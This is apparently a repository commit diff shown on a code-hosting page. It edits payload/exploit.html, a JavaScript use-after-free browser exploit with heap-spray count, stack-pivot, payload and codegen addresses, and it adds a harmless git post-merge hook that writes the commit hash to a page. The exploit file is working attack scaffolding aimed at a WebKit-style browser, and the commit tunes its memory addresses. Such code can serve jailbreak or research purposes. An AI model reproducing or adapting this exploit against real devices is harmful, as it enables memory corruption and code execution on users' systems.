+ 2
- 2
payload/exploit.html
查看文件
| @@ -11,11 +11,11 @@ Result: Bug is present, crash | |||
| <script> | |||
| function UaF(a) | |||
| { | |||
| var delta = 0x<!--#echo var="delta" -->00000; //from 0x0 to 0x400000 step by 0x100000 | |||
| var delta = 0x0<!--#echo var="delta" -->000000; //from 0x0 to 0x400000 step by 0x100000 | |||
| var OS_Exit = 0x0101cd80; | |||
| var pivotAdress = 0x010ADDCC; | |||
| var pivotAdressAdress = 0x1B100000; //r6 | |||
| var payloadAdress = 0x1D800000 + delta; | |||
| var payloadAdress = 0x1D000000 + delta; | |||
| var codegenAddress = 0x01800000; | |||
| var sizeWebCoreImageLoader = 0x18; | |||
| var sprayCount = 0x1000; | |||
+ 3
- 0
post-merge.example
查看文件
| @@ -0,0 +1,3 @@ | |||
| #!/bin/sh | |||
| # If you cloned this repo from git, you can copy this file to .git/hooks/post-merge to make the git commit version display at the bottom of the page work. | |||
| git rev-parse --short HEAD > commit.html | |||
Loading…